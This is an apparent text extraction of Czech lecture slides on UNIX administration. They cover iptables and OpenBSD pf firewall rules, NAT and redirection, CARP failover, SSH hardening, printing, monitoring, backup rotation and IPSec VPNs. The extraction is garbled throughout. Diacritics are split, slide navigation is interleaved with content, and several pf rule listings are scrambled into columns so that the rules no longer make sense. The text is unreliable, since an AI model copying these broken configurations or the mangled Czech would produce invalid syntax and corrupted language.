typ a kód ICMP zprávy

Tabulky NAT RDR

8/0 0/0 11/0 11/1 3/0 3/1 3/2 3/3

echo echo reply TTL pˇrekroˇcen chybí fragment pro rekonstrukci cílová sít’ není dostupná cílový uzel není dostupný cílový protokol není povolen cílový port není otevˇren ...


CARP Správa

Vyzkoušejte si

Linuxové implementace


ˇ nekolik snah o vytvoˇrení ipchains iptable


Implementace Pravidla Realita života. . . Tabulky

nutno zakompilovat do kernelu (modulu) ˚ mocné, ale složité


CARP Správa

Vyzkoušejte si

ipTables plug-in moduly ovládání: iptables(8), iptables-save(8), iptables-restore(8) generátor pro normální lidi: http://firehol.sf.net/

Administrace UNIXu

ipTables

Leo Galamboš

-m state --state RELATED -j ACCEPT


-p udp -m -j -p udp -m -j

udp --sport 53 -m state --state ESTABLISHED ACCEPT udp --dport 53 -m state --state NEW,ESTABLISHED ACCEPT


-p udp -m udp --sport 7000:7008 -m state --state ESTABLISHED -j ACCEPT -p udp -m udp --sport 7021 -m state --state ESTABLISHED -j ACCEPT -p udp -m udp --sport 88 -m state --state ESTABLISHED -j ACCEPT -p udp -m udp --sport 750 -m state --state ESTABLISHED -j ACCEPT -p icmp -m icmp --icmp-type 8 -j icmpflood -A icmpflood -m limit --limit 100/sec --limit-burst 50 -j RETURN -A icmpflood -m limit --limit 1/sec -j LOG --log-prefix "’ICMP FLOOD:’" -A icmpflood -j DROP


CARP Správa

Vyzkoušejte si

Implementace OpenBSD


ovládání fw modulu zajišt’uje pfctl(8) pfctl -e zapne pfctl -d vypne pfctl -s . . . ukáže vnitˇrní tabulky (all, state, nat, rules. . . ) pfctl -f . . . natáhne konfiguraci pfctl -F . . . smaže vnitˇrní tabulku (all, rules, state. . . ) iniciální konfigurace je v /etc/pf.conf (RC skript default) poznámka: seznam sít’ových adaptéru˚ ifconfig -a


CARP Správa

Vyzkoušejte si

Administrace UNIXu

Pravidla


Implementace

block block block block block block block block block block block block block block

in in in in in in in in in in in in in in

Pravidla

on le1 on le1 proto on le1 proto on le1 proto log on le1 log quick on log quick on log quick on log quick on log quick on log quick on log quick on log quick on

Realita života. . . Tabulky

tcp from any to any tcp all {tcp,udp} from any to any


CARP

le1 le1 le1 le1 le1 le1 le1 le1

Správa

from from from from from from from

any any any any any any any

to to to to to to to

le1 port 8080 le1 port 1:80 le1 port 1><8 le1 port 1<>6 le1:0 le1:network le1:broadcast

Vyzkoušejte si

Pravidla


Implementace Pravidla Realita života. . .

pass in on le1 proto tcp all flags S/SA keep state pass in log-all on le1 proto tcp all \ flags S/SA keep state pass in quick on lo pass in on le1 proto tcp from any to le1:0 \ flags S/SA keep state \ ( max-src-conn 100, \ max-src-conn-rate 50/10 ) pass in on le1 proto tcp \ from le1:network to le1 \ flags S/SA keep state

Tabulky NAT RDR Synchronizace stavu˚

CARP Správa

Vyzkoušejte si

Pravidla – praktický pˇríklad


ˇ Na serveru máme SOCKS bežící na uživatele _sockd (999). Tento server má právo zakládat LISTEN sockety a pracovat s nimi. Ostatní nikoliv.


scrub all fragment reassemble block drop in log all pass out on ep0 inet proto tcp all keep state pass out on ep0 inet proto udp all keep state pass out on ep0 inet proto icmp all keep state pass in on ep0 inet proto tcp from any \ to ep0 port > 1023 user = 999 keep state pass in on ep0 inet proto udp from any \ to ep0 port > 1023 user = 999 keep state


CARP Správa

Vyzkoušejte si

Administrace UNIXu Leo Galamboš Firewall

To je moc komplikované,. . . a co když si pak omylem sám zavˇru pˇrístup na firewall?

ICMP, UDP, TCP


CARP Správa

Vyzkoušejte si

ˇ eˇ Nepanikaˇrte, to se bežn stává a je to normální. Procházka do servrovny je zdravá!


Jak se bránit vlastním chybám?


zaved’te do cron-u mazání pravidel firewallu napište si skripty, které uloží stávající pravidla, aktivují nová a po urˇcené dobeˇ vše vrátí do výchozího stavu


CARP Správa

Vyzkoušejte si

Jak debuggovat? nmap scan a identifikace cíle nessus scan a rady typu "filter out ICMP timestamp requests"

Zjednodušení správy: tabulky


table table table block

{ 10.0.0.0/8 } const { 10.0.0.0/8 } persist { 10.0.0.0/8 } in on le1 from to any

ICMP, UDP, TCP


ˇ Tabulku lze modifikovat zvnejšku (není-li konstantní) a pokud je založena (persistentní tabulky nejsou nikdy vylouˇceny “optimalizací”): pfctl -t uchylaci -T add 172.16.0.0/12 pfctl -t uchylaci -T delete 10.0.0.0/8 pfctl -t uchylaci2 -T show Tuto techniku používá spamd(8) spamd-setup(8) pro inject IP adres.

CARP Správa

Vyzkoušejte si

Tabulky


naˇcítaní ze souboru table file /etc/pf.tbl

Implementace Pravidla Realita života. . . Tabulky NAT

ˇ tabulka muže ˚ být naˇcítána z nekolika souboru˚ tabulka typicky zastupuje zdrojovou nebo cílovou adresu ˇ eˇ v souboru: pfctl -f /etc/pf.conf pˇri zmen -T load table <spamd> persist file "/etc/spammers" block in on le2 proto tcp from <spamd> to port smtp

RDR Synchronizace stavu˚

CARP Správa

Vyzkoušejte si

Administrace UNIXu

NAT



A

R

S

A:23042 -> S:80

R:41099 -> S:80

R:41099 -> S:80

S:80 -> A:23042

S:80 -> R:41099

S:80 -> R:41099


CARP Domácí rozvod 192.168.X/24

Tabulka stavů R:41099 <-> A:23042

pˇrepis zdrojové adresy a portu za jiné ˇ typické nasazení na smerovaˇ ci

Správa

Vyzkoušejte si

Pˇríklady použití


nat on le0 from le1:network to any -> le0

ICMP, UDP, TCP


######## totéž ale DHCP robust nat on le0 from le1:network to any -> (le0)


CARP

######## totéž ale nepˇ rehlednˇ eji nat on le0 from 192.168.2.0/24 to any -> \ 192.168.8.100

Poˇradí NAT a pravidel Nejprve se ˇreší NAT, potom se teprve aplikují pravidla firewallu. Je možné firewallovací pravidla pˇreskoˇcit speciálním NAT pravidlem typu nat pass ...

Správa

Vyzkoušejte si

Administrace UNIXu

RDR


A

R

S

S:3055 -> A:22

S:3055 -> R:2022

S:3055 -> R:2022

A:22 -> S:3055

R:2022 -> S:3055

R:2022 -> S:3055


Domácí rozvod 192.168.X/24


Tabulka stavů S:3055 <-> R:2022 <-> A:22

CARP Správa

pˇrepis cílové adresy a portu za jiné ˇ typické nasazení na smerovaˇ ci kryjícím vnitˇrní sít’ Pozor, vniˇrní RDR: 192.168.2.22:XXXX → 195.113.20.126:80 → RDR v 192.168.2.98 → 192.168.2.25:80 → 192.168.2.22:XXXX FAIL

Vyzkoušejte si

Pˇríklady použití


Implementace

rdr on le0 from any to le0 port 25 -> \ 192.168.2.23 port 25

Pravidla Realita života. . . Tabulky NAT

nebo table <spamaci> persist { 10.0.0.0/8 } rdr on le0 from <spamaci> to le0 port 25 -> \ 127.0.0.1 port spamd

Poˇradí RDR a pravidel Nejprve se ˇreší RDR, potom se teprve aplikují pravidla firewallu.

RDR Synchronizace stavu˚

CARP Správa

Vyzkoušejte si

Administrace UNIXu

Synchronizace



pfsync


CARP Správa

Vyzkoušejte si

více firewallu, ˚ resp. spare boxy “více” ⇒ multicast



Implementace Pravidla Realita života. . .

ifconfig pfsync0 syncdev le2 [ syncpeer ... ] ifconfig pfsync0 up

Tabulky NAT RDR Synchronizace stavu˚

CARP

syncpeer je nepovinná položka (default: multicast 224.0.0.240) automatické startovaní /etc/hostname.pfsync0 (ˇctou RC skripty): up syncdev le2 syncpeer ...

Správa

Vyzkoušejte si

Administrace UNIXu

Úvod



Virtual Router Redundancy Protocol (VRRP) – RFC 2338


Cisco vlastní Hot Standby Router Protocol Common Address Redundancy Protocol (CARP) ˇ na právní kliˇcky firmy Cisco odpoved’ vylepšení VRRP o náznaky bezpeˇcnosti autoˇri: Ryan McBride, Michael Shalayeff, Marco Pfatschbacher, Markus Friedl

CARP Správa

Vyzkoušejte si

Administrace UNIXu

CARP

Leo Galamboš

multicast 224.0.0.18, IP protokol 112

Firewall

MAC 00:00:5e:00:01:XX, XX je cˇ íslo virtuálního CARPu

Implementace

ˇ TTL 255 ⇒ zahození pˇresmerovaných packetu˚ pˇri TTL<255 stavy: INIT, MASTER, BACKUP advbase + advskew 256 inicializace: 1 2

net.inet.carp.allow=1 net.inet.carp.log=1

start: 1 2

ifconfig carp0 create ifconfig carp0 vhid XX advskew 100 advbase 1 pass HESLO carpdev le1 192.168.100.5 255.255.255.0

ICMP, UDP, TCP

Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚

CARP Správa

Vyzkoušejte si

Modifikace



Pˇrímo pˇres ifconfig(8) je možné modifikovat parametry CARPu:


CARP

ifconfig carp0 advskew 50 ifconfig carp0 advbase 2 status: ifconfig carp0

Správa

Vyzkoušejte si

RC-init



Do /etc/hostname.carp0


inet 192.168.100.5 255.255.255.0 192.168.100.255... ...vhid XX advskew 100 advbase 1... ...pass HESLO carpdev le1

ˇ sh /etc/netstart Rychlý reinit síte:

CARP Správa

Vyzkoušejte si

Vyzkoušejte si


(na RT) povolte spojení do SMTP (na RT) povolte DNS služby ˇ (na RT) pomocí RDR pˇresmerujte SMTP dovnitˇr na HUBy 20-24 ˇ (na RT) nastavte spamd(8) a nekterým vymezeným strojum ˚ dávejte vnitˇrní SMTP, jiným spamd z RT pass in quick on lo pass out quick on lo block in block out pass in quick on le1 proto tcp \ from any to le1 port smtp \ flags S/SA keep state

ICMP, UDP, TCP


CARP Správa

Vyzkoušejte si

Vyzkoušejte si


ˇ založte druhý RT smerovaˇ c


na obou RT povolte NAT konfigurujte CARP na všech adaptérech RT ˇ smerovaˇ cu˚ ˇ nastavte pfsync mezi RT smerovaˇ ci ˇ ven spojem z HUBu 20-24 (SSH. . . ) projdete zabijte stroj, který o sobeˇ tvrdí, že je masterem CARPu pˇrežila konekce? jaké nedostatky má toto ˇrešení?


CARP Správa

Vyzkoušejte si

Administrace UNIXu Leo Galamboš SSH Tisk

ˇ Cást VII

ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy

Zálohování Vyzkoušejte si

SSH. Tisk. Výkon, dohled, zálohování.

Program

Administrace UNIXu Leo Galamboš SSH

33

SSH

Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚

34

Tisk

Dohled nad systémy


35


36

Zálohování

37

Vyzkoušejte si


Internet

IPSec

Štít

SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚

Road warrior

Dohled nad systémy


Dohled Tisk

SMTP

Zálohování DNS

AMD

NIS/YP

NFS

Secure Shell silná autentizace a bezpeˇcná komunikace nad nebezpeˇcnými kanály forwardování Xových konekcí ˇ forwardování bežných TCP spojení/portu˚ nahrazuje puvodní ˚ BSD pˇríkazy (rsh, rlogin, rcp) v pˇrípadeˇ bezchybné implementace chrání pˇred IP spoofing – vzdálený host posílá “cizí” packety DNS spoofing – útoˇcník falšuje DNS záznamy odposlech/manipulace s datovým tokem na routerech odposlech Xové autentizace a spoofing Xového spoje

kódování SSH1 DES 3DES (IDEA) Blowfish SSH2 3DES Blowfish Arcfour CAST128 AES128/192/256 integrita SSH1 postrádá silný mechanismus SSH2 hmac-md5/sha1/ripemd160

Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy


Konfigurace Per-user v adresáˇri $HOME/.ssh uživatelská konfigurace config


rc – skript spouštený pˇred shellem (nebo povelem ˇ spoušteným via ssh(1) param) environment – nastavení prostˇredí (LIBPATH=/nfs/linux26/usr/lib) known_hosts – identifikace známých serveru˚ authorized_keys – autorizované veˇrejné klíˇce s omezeními Per-server v adresáˇri /etc/ssh uživatelská defaultní konfigurace ssh_config konfigurace serveru sshd_config ostatní soubory jsou klíˇce (RSA, DSA. . . ) – je možné ˇ je smazat, server je znovu vytvoˇrí, ale klienti by meli ˇ své klíˇce “podle plánu” být varováni, že server mení



SSH autentizace


1

jménem a heslem

Tisk

2

veˇrejným klíˇcem (s heslem i bez) SSH1 RSA SSH2 RSA DSA

ˇ rení a dohled Meˇ

3

Kerberos (SSH1)

4

R* kompatibilita identita serveru versus $HOME/.ssh/ssh_known_hosts a /etc/ssh/ssh_known_hosts StrictHostKeyChecking – není možné se na neznámé stroje pˇripojit

Dohled nad prutoky ˚ Dohled nad systémy


Veˇrejný klíˇc


ssh-keygen # (privátní) $HOME/.ssh/id_dsa, (veˇ rejný) id_dsa.pub cd .ssh scp id_dsa.pub remote@hole:.ssh/authorized_keys Password: XXX ssh -l remote hole bash-5.0$ _

Finta Je možné takto autorizovat i cizí veˇrejný klíˇc a pujˇ ˚ cit tak svoji identitu.



Administrace UNIXu

SSH a rychlost

Leo Galamboš SSH Tisk

Kódování bez kódování rc4 tss des (SSH1) idea 3des (default)

start-up 100 83 98 87 95 81

prutok ˚ 100 82 77 57 44 31

3DES nahrazován blowfish-em (rychlost) komprese za cenu circa 2.12× zpomalení na CPU



SSH a bezpeˇcnost


nic není dokonalé díky nepˇresné implementaci chyby z knihoven tˇretích stran

Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚

ˇ Rešení: OpenSSH se vydalo cestou monitoru a snížení ˇ velikosti kódu bežícího pod root-em 1

první otrok ve /var/empty chrootu

2

provede pˇred-autentizaci, root operace posílá monitoru pokud monitor potvrdí správnost autentizace

3

export statických dat z otroka 1 do otroka 2 (už uživatel) statické pˇres monitor, dynamické pˇres sdílenou ˇ pamet’ export: kryptomateriál, slovníky zlib-u

Dohled nad systémy


SSH a bezpeˇcnost


ˇ zmena portu, protokolu pˇrihlašování root-a, ev. povolení jen pˇríkazu˚

Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy

maximální poˇcet neauthorizovaných pˇripojení

Zálohování

maximální prodleva pˇrihlášení

Vyzkoušejte si

autentikace heslem

/etc/ssh/sshd_config Port 1234 Protocol 2 PermitRootLogin no/forced-commands-only MaxStartups 3:50:6 LoginGraceTime 30 PasswordAuthentication no

ˇ Specifikum potemkina: Apache, WWW


start: httpd_flags=“-u” (vypne chroot) ˇ jak pˇristoupit z nejakého solidního GUI na port 80? ssh -R 8080:localhost:80 GUI.me

mozilla localhost:8080

Potěmkin NAT

GUI.me



Administrace UNIXu

Tisk

Leo Galamboš

Tiskárna je obecneˇ SSH

lokální: dˇríve cˇ asto na paralelním portu, nyní na USB

Tisk

vzdálená (sít’ová: fyzický HW se sít’ovou podporou)

ˇ rení a dohled Meˇ Dohled nad prutoky ˚

UNIX pˇredpokládá ˇ tiskáren je nekolik (organizace do tˇríd) uživateli je jedno na jaké tiskárneˇ dané tˇrídy “to vyleze” Postup UNIXových stroju˚ pˇrijme se datový tok pˇríslušející tiskárneˇ a uloží se do spool-u ze spool-u se vybírají úlohy podle nastavení priorit úloha je bud’ s RAW daty nebo se musí rozpoznat filter pro danou tiskárnu filter se spustí a jeho výstup je zaslán tiskárneˇ

Dohled nad systémy


Software


LPD69 /LPR70

– BSD ˇrešení s konfigurací v /etc/printcap LPD/LP – SystemV ˇrešení se solidním managementem front LPRng (next generation) management front vylepšený cˇ ásteˇcneˇ na úrovenˇ LP bezpeˇcnostní vylepšení: práva pˇrístupu, software ˇ na root-a nebeží

Internet Printing Protocol (IPP) – cross-platform implementace CUPS71

69

Line Printer Daemon Line Printer Remote 71 Common UNIX Print Server 70



LPD/LPR


lpr zašle soubor na tiskovou frontu (ID je vráceno)


lpq zobrazí aktuální stav fronty lprm odstraní úlohu z fronty (muže ˚ pouze vlastník nebo root) lpd démon – úlohy z fronty posílá na tiskárnu lpc dohledová utilita – zapnutí/vypnutí pˇríjmu ˇ úloh, správa fronty (mazání, zmena poˇradí), restart lpd konfigurace v /etc/printcap


Common UNIX Print Server









ˇ ejší ˇ náˇradí Nejbežn


ˇ disk Systém, pamet’,

SSH

top(1)

Tisk

vmstat(1)


systat(1) – systat vmstat (BSD) iostat(1) dstat(1) (Linux) – ve Sleuth má jiný význam Sít’ 1

ntop(1)

2

ifstat(1)

Podpurné ˚ a jiné 1

watch(1)

2

xlogmaster(1)

3

apachetop(1)



Systat



dstat



SNMP a Round-robin databáze démon net-snmp, konfigurace snmpconf export hodnot systému pˇres standardizovaný protokol (SNMPv1/2/3) hodnoty lze nejen cˇ íst ale i zapisovat cˇ tení slouží pro dohled a sledování a muže ˚ být PUBLIC ˇ nastavení a zápis hodnot muže ˚ zásadneˇ menit ˇ by být PUBLIC nemel pˇrístup je omezen COMMUNITY jménem nebo uživatelem a heslem72 vylistování celého stromu: snmpwalk -v1 -c commname localhost . automatické zpracování hodnot (pro archivaˇcní úˇcely) Multi Router Traffic Grapher (MRTG) – napojení na SNMP prvky RRDTool – obecné zobrazovátko Round-Robin údaju˚ 72

separátní báze od systémové



Multi Router Traffic Grapher



Dohled nad systémy


Software ˇ jMon – monitor CPU a využití pameti BigBrother – nyní komerˇcní ˇ BB BigSister – reakce na zkomerˇcnení Nagios První dva produkty definují dva typy uzlu˚ sledovaˇc – kontroluje dostupnost jednotlivých služeb, sbírá hodnoty ze systému zobrazovaˇc – akceptuje hodnoty zaslané ze snímaˇcu˚ a zobrazuje sumáˇre Sledovaˇce jsou podporované i na MS-Windows.



BigBrother



BigSister – overall



BigSister – detail



Zálohování


Ochrana proti ztráteˇ dat


“pokažení” dat – historie záloh V praxi se nezálohuje vubec ˚ – obrovská chyba drží se jen poslední záloha – na pokažená data se ˇ vetšinou pˇrijde po delší dobeˇ a pak je už pozdeˇ nešifruje – praktické problémy vkládáním hesel konstantním prutokem ˚ do streameru˚ (nyní už moc nehrozí)


Zálohování na UNIXu


zálohy na UNIXu mají pˇríˇrazenou úrovenˇ

SSH

úrovenˇ 0: plná záloha

Tisk

úrovenˇ N: pˇrírustková ˚ záloha, záloha souboru˚ ˇ ených ˇ zmen po záloze na nižší úrovni


software dump/restore /etc/dumpdates – znaˇcky archivací jednotlivých úrovní zálohuje cokoliv na libovolný poˇcet pásek zvládá pˇrírustky ˚

tar, cpio bezpeˇcnost: používejte archivaci ATIME, MTIME, CTIME metadat cpio: dokáže pˇreskakovat chyby

amanda



Zálohování – pˇríklady

Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ

# dump -a -0 -f - /usr/local | ( cd /usr/local2 ; restore -x -f - ) # dump -a0uf - /etc | gzip >/bck/full.gz

# tar cf - /usr/local | tar -xf - -C /usr/local2



Zálohování – problematika


Potˇrebujeme

Tisk ˇ rení a dohled Meˇ

1

poslední zálohu

2

zálohy z pˇredchozí doby

Zálohování

3

neutratit vše za média

Vyzkoušejte si

ˇ Rešení rotování médií sofistikovaný algoritmus rotování ˇ Hanojská vež GFS (grandfather-father-son)


Administrace UNIXu

ˇ Hanojská vež

Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy

Zálohování

1−2−1−3−1−2−1−4−1−2−1−3−1−2−1−5−1−2−1−3−1−2−1−4−1−2−1−3−1−2−1

5 médií – rotování na 31 dní

Vyzkoušejte si

Administrace UNIXu

GFS

Leo Galamboš SSH

Po Ut St Ct Pa

Tisk

Tˇri druhy médií

ˇ rení a dohled Meˇ Dohled nad prutoky ˚

syn denní pˇrírustková ˚ záloha otec týdenní plná záloha ˇ ˇ cní plná záloha dedek mesíˇ ˇ Priorita: dedek otec syn

Kolize ˇ prioritou. Každý den se provádí jen záloha s nejvetší

Dohled nad systémy


Vyzkoušejte si


1

centralizujte logy na jednu ze stanic

Zálohování

2

ˇ dohledové centrum zprovoznete

Vyzkoušejte si

3

monitorujte prutok ˚ pˇres stroj RT

4

monitorujte velikost disku˚ jednotlivých stroju˚

5

vytvoˇrte vlastní politiku záloh

Vlastní jádro


Proˇc kompilovat vlastní jádro standardneˇ dodané jádro nepodporuje dané zaˇrízení a boot -c nepomáhá potˇrebujeme experimentální moduly jádra potˇrebujeme jiná nastavení pro atypická nasazení a sysctl(8) nepomáhá Co je potˇreba? zdrojové kódy jádra (OpenBSD: srcsys.tar.gz; ˇ FreeBSD, Linux: vetšinou balíˇcky) pˇrekladaˇc a ˇradu utilit



(Open)BSD: vlastní jádro Postup tvorby nového jádra srcsys.tar.gz vytvoˇrí strom v /usr/src/sys/...

Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ

.../arch/i386/conf/ obsahuje konfiguraˇcní soubory

Zálohování

nad konfiguraˇcním souborem se spustí config(8)

Vyzkoušejte si

vznikne mašinérie v .../arch/i386/compile (../compile) spustí se make(1) z mašinérie výsledné jádro se nakopíruje místo starého staré jádro se typicky pˇresouvá do /bsd.old aby bylo po ruce v pˇrípadeˇ rollbacku Konfigurace živého jádra 1

config -e -o /bsd.new /bsd

2

config -e -f /bsd


Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD

ˇ Cást VIII

IKE/ISAKMP

Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP

Virtual Private Network (VPN)

ˇ Záver

Program

Administrace UNIXu Leo Galamboš VPN

38

VPN PPTP IPSec SPD a SAD IKE/ISAKMP

PPTP IPSec SPD a SAD IKE/ISAKMP


ˇ Záver

39


40

ˇ Záver

Administrace UNIXu

Internet

IPSec

Leo Galamboš Štít


Road warrior


ˇ Záver

Dohled Tisk

SMTP

Zálohování DNS

AMD

NIS/YP

NFS

Administrace UNIXu

Nasazení

Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP Tunel

Konfigurace Internet

IPSec ISAKMPD ˇ Firewall a smerování PPTP

ˇ Záver Road warrior

bezpeˇcné pˇripojení ke svým datum ˚ i na cestách spojení na veˇrejných (levných) linkách s ochranou proti odposlechu ˇ propojení více privátních sítí pˇremostením pˇres Internet snížení nákladu˚ na privátní linky velká pˇrenosová rychlost

Technologie


PPTP (RFC 2637) obzvlášteˇ nešt’astná implementace spoleˇcnosti Microsoft (vylepšeno posledními aktualizacemi) PPTP server dostupný spolu s Windows Server ˇ klientský software poˇcínaje Windows NT vestavený Poptop73 je OSS PPTP server (i pro Linux, BSD. . . ) nahrazováno L2TP/IPsec74

IPsec komplikovaná technologie dobˇre vyˇrešené bezpeˇcnostní aspekty ochrana: šifrování, autentizace, ochrana integrity toku i jeho "pˇrehrání" ˇ eˇ zaveden i do IPv4 (poˇcátek vyvinut pro IPv6, zpetn 90. let)

73 74

http://www.poptop.org/ více než 100 kliknutí v XP, pouze 15 ve Vista



ˇ Záver

Administrace UNIXu

Point to Point Tunnelling

Leo Galamboš

PPP


Konfigurace IPSec ISAKMPD

PPTP

ˇ Firewall a smerování PPTP

ˇ Záver

PPTP je varianta VPN pro zabezpeˇcený pˇrístup do korporátních sítí ˇrídící spoj nad TCP/1723 – ustavuje a ruší sezení v rámci tunelu tunel nad GRE se zakódovanými a kompresovanými PPP pakety autentizace: MSCHAPv2, MSCHAP, CHAP, PAP kódování pˇres moduly (kompresní): RC4 40-128b

otevˇrený standard (RFC2637)

IPSec módy

Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP


transport hlaviˇcka prozrazuje skuteˇcného pˇríjemce a odesílatele tunel hlaviˇcka prozrazuje oba konce tunelu


ˇ Záver

Protokoly a základní termíny

Administrace UNIXu Leo Galamboš VPN PPTP IPSec

Security Association (SA) Internet Key Exchange (IKE) autentizuje uzly a nastavuje zabezpeˇcení na spoji veˇrejným klíˇcem digitálním podpisem dopˇredu známým (spoleˇcným) tajným klíˇcem

Authentication Header (AH) zajišt’uje integritu a autenticitu dat rychlá hash-funkce na obsah pˇrenášených dat

Encapsulation Security Payload (ESP) zajišt’uje utajení, integritu a autenticitu toku

SPD a SAD IKE/ISAKMP


ˇ Záver

AH hlaviˇcka


next header: protokol puvodního ˚ pˇrenášeného paketu délka AH hlaviˇcky v 32b slovech Security Parameters Index (SPI) identifikuje parametry AH75 sekvenˇcní cˇ íslo brání opakovanému pˇrehrávání toku autentizaˇcní hodnota (Integrity Check Value)

ICV se poˇcítá na základech MD5 nebo SHA1 s “barvením” tajným klíˇcem – HMAC76 RFC 2104

75 76

Algoritmus hashe, jeho parametry, atp. Hashed Message Authentication Code



ˇ Záver

AH transport


nová IP hlaviˇcka specifikuje protokol AH ˇ paketu obsahuje: nové telo


Konfigurace IPSec

AH hlaviˇcka: next header je protokol v puvodní ˚ IP hlaviˇcce ˇ puvodního telo ˚ IP paketu

ˇ ˇ ICV pokrývá vše vyjma: ICV a nekolika promenných položek v nové IP hlaviˇcce (TOS, flags, frag offset, TTL, header checksum)

ISAKMPD ˇ Firewall a smerování PPTP

ˇ Záver

AH tunel

Administrace UNIXu Leo Galamboš VPN PPTP

nová IP hlaviˇcka specifikuje protokol AH

IPSec SPD a SAD IKE/ISAKMP

nová IP hlaviˇcka muže ˚ nést jiné src/dst IP adresy ˇ paketu obsahuje: nové telo AH hlaviˇcka: next header je IP (obalujeme celý puvodní ˚ IP paket) celý puvodní ˚ IP paket

ˇ pokrývá vše vyjma: ICV a nekolika ˇ ˇ ICV opet promenných položek v nové IP hlaviˇcce (TOS, flags, frag offset, TTL, header checksum)


ˇ Záver

ESP hlaviˇcka a patiˇcka


ESP položky obklopují pˇrenášený obsah, hlaviˇcka nese SPI

VPN PPTP IPSec SPD a SAD

sekvenˇcní cˇ íslo a patiˇcka nese

IKE/ISAKMP


výplnˇ pro šifrovací algoritmy s pevnou velikostí bloku velikost výplneˇ next header autentizaˇcní hodnota (volitelneˇ pˇri ESP+auth) ICV pokrývá ESP hlaviˇcku i patiˇcku (bez ICV) a ˇ r) celý obsah IP paketu pˇrenášený obsah, nikoliv (témeˇ jako u AH Šifruje se pˇrenášený obsah a patiˇcka bez ICV


ˇ Záver

ESP transport


nová IP hlaviˇcka specifikuje protokol ESP ˇ paketu obsahuje: nové telo ESP hlaviˇcka a patiˇcka: next header je protokol v puvodní ˚ IP hlaviˇcce ˇ puvodního telo ˚ IP paketu

ESP hlaviˇcka se nešifruje, ale patiˇcka bez ICV ano!

IKE/ISAKMP


ˇ Záver

ESP tunel


nová IP hlaviˇcka specifikuje protokol ESP nová IP hlaviˇcka muže ˚ nést jiné src/dst IP adresy ˇ paketu obsahuje: nové telo ESP hlaviˇcka a patiˇcka: next header je IP (obalujeme celý puvodní ˚ IP paket) celý puvodní ˚ IP paket

Z paketu nelze nic zásadního vyˇcíst, protože i “next header” položka je šifrována



ˇ Záver

Administrace UNIXu

IKE

Leo Galamboš VPN

B


Konfigurace 1 IKE

2

IPSec

router A – nutnost šifrovat

ˇ Firewall a smerování

3

A-IKE↔B-IKE

4

dohoda o IPSec SA

5

A má koneˇcneˇ SA s B

6

A→B - nyní již projde

IKE

A

A→B - není IPSec SA

ISAKMPD

PPTP

ˇ Záver

Celá pohádka najednou. . . kterak A komunikovalo s B a mezi nimi byla IPSec roura ˇ mezi jejich smerovaˇ ci RTA a RTB: 1 A posílá zprávu (paket) 2 RTA to vidí a podle svého nastavení zjistí, že podléhá šifrování 3 nastavení také ˇríká, že tunel povede do RTB 4 RTA si zjistí, zda-li již má IPSec SA s RTB, pokud ne:



ˇ Záver

RTA požádá své IKE o dodání IPSec SA k RTB máme IKE SA RTA-RTB? ano, pak je IPSec SA rychle vytvoˇreno ˇ eˇ ne, IKE SA vznikne (souˇcasneˇ dojde k výmen digitálních podpisu˚ IKE procesu) ˚

pˇri nastavení IPSec SA dojde k dohodeˇ o kódovacím algoritmu (DES. . . ) autentizaˇcním algoritmu (MD5. . . ) 5 6 7

RTA patˇriˇcneˇ zpracuje paket a odešle jej RTB RTB obdrží paket, zjistí pˇríslušný IPSec SA zpracuje paket a odešle jej B

Security Policy


ˇ šifrovat? Definujeme filtr: Jak víme, že máme neco


pravidlem o nakládání se vstupním cˇ i výstupním tokem (na RTA, RTB) autentizaˇcní metoda metoda zabezpeˇcení (AH, ESP) hashovací funkce (SHA, MD5)

Security Policy Database Souhrn všech "Security Policy"v systému, který je konfigurován administrátorem.


ˇ Záver

Security Association


1

cílová IP adresa

2

32b Security Parameter Index (SPI) – obdoba portu na úrovni TCP/UDP

PPTP IPSec SPD a SAD

3

identifikátor bezpeˇcnostního protokolu (esp, ah)

IKE/ISAKMP


Filtr to odboˇcil, cˇ ím ale šifrovat? Pˇres SPI do tabulky, ale SPI není samostatneˇ jednoznaˇcné, proto se indexuje v SA Database (SAD) celou trojicí (SA).

Jak naplníme SAD? Ruˇcneˇ anebo lépe automaticky, protokolem IKE/ISAKMP.

ˇ Záver

IKE/ISAKMP Internet Key Exchange protokol zajišt’uje bezpeˇcnou ˇ informací pro výpoˇcet šifrovacích klíˇcu˚ výmenu ˇ oddelený od IPSec s využitím pro jiné protokoly (OSPF, SSL/TLS. . . ) ˇ domlouvá SA a vymeˇ nuje kryptomateriál (klíˇce)77 Main/aggressive mode (AKA fáze 1) ˇ domlouvá a ustavuje jeden bezpeˇcný obousmerný kanál (ISAKMP Security Association) ˇ vymeˇ nuje kryptografický materiál (klíˇce) a na jeho základeˇ ustavuje sdílený tajný klíˇc autentizuje uzly (poˇcítaˇcové identity)

Quick mode (AKA fáze 2) domlouvá a ustavuje bezpeˇcný kanál pro datový ˇ pˇrenos mezi dvema uzly ˇ výsledkem jsou nejméneˇ dveˇ jednosmerné SA ˇ SAD (in/out) – naplnení

UDP zprávy z/na port 500 77

Totéž lze manuálneˇ s ipsecadm(8)



ˇ Záver

Administrace UNIXu

ˇ IKE podrobneji

Leo Galamboš

Fáze 1 ˇ ˇ main – oddelená výmena klíˇcu˚ a autentizace (6 zpráv)


aggressive – kondenzovaný "main"(3 zprávy)


ˇ Záver

Policy proposals Policy acceptance

Diffie-Hellman/Nonce Diffie-Hellman/Nonce

Identification/Certificate/Signature Identification/Certificate/Signature

Administrace UNIXu

ˇ IKE podrobneji

Leo Galamboš

Fáze 2 (quick mód) – 3 zprávy



ˇ Záver

Hash/IPsec proposal/Nonce/[Diffie-Hellman/Identities]

Hash/IPsec policy acceptance/Nonce/[Diffie-Hellman/Identities]

Hash

ISAKMP Quick mode


